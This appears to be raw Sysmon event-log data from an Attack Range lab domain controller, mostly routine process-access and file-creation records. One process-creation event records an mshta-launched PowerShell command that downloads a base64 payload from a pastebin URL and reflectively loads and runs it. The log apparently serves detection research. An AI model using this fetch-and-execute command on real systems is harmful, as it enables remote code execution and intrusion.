07:59:29.717{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106573Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.717{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106572Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.712{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B461-615A-3002-00000000FC01}7804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106571Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.710{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106570Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.709{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106569Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.709{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106568Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.709{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106567Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.709{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106566Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.709{58E9C193-B461-615A-2902-00000000FC01}73927760C:\Windows\system32\mshta.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106565Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.708{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106564Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.708{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106563Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.707{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106562Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.692{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106561Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.692{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000106560Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:59:29.677{58E9C193-B461-615A-2C02-00000000FC01}7508\PSHost.132778079695292559.7508.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x8000000000000000106559Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:59:29.667{58E9C193-B461-615A-2B02-00000000FC01}7500\PSHost.132778079695257469.7500.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000106558Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.652{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106557Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.652{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106556Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.652{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106555Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.647{58E9C193-B461-615A-2C02-00000000FC01}7508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4ruppwv0.p3e.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106554Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.647{58E9C193-B461-615A-2B02-00000000FC01}7500ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3n4a23kv.ztt.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106553Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.647{58E9C193-B461-615A-2C02-00000000FC01}7508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3qptkjji.yhe.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106552Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.647{58E9C193-B461-615A-2B02-00000000FC01}7500ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mmlgzz0h.bzn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106551Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.632{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106550Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.632{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106549Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.617{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3qptkjji.yhe.ps12021-10-04 07:59:29.617 10341000x8000000000000000106548Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.612{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106547Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.612{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106546Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.612{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mmlgzz0h.bzn.ps12021-10-04 07:59:29.612 10341000x8000000000000000106545Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.600{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106544Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.595{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106543Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.573{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADE9A5F2E539C527438EE246E320FF97,SHA256=6E1F0BF94973011E3F6B597110DCC7CD4A168E69D39D6309B9F4E47B57D11CFB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106542Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.551{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2E02-00000000FC01}7532C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106541Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.551{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2E02-00000000FC01}7532C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106540Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 